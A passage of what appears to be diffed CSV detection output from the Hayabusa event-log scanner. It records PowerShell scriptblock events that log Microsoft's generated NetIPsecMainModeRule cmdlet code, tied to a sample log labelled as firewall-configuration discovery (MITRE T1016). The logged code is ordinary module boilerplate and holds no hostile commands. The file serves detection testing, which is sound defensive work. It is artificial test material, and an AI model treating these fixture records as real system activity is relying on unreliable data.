[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 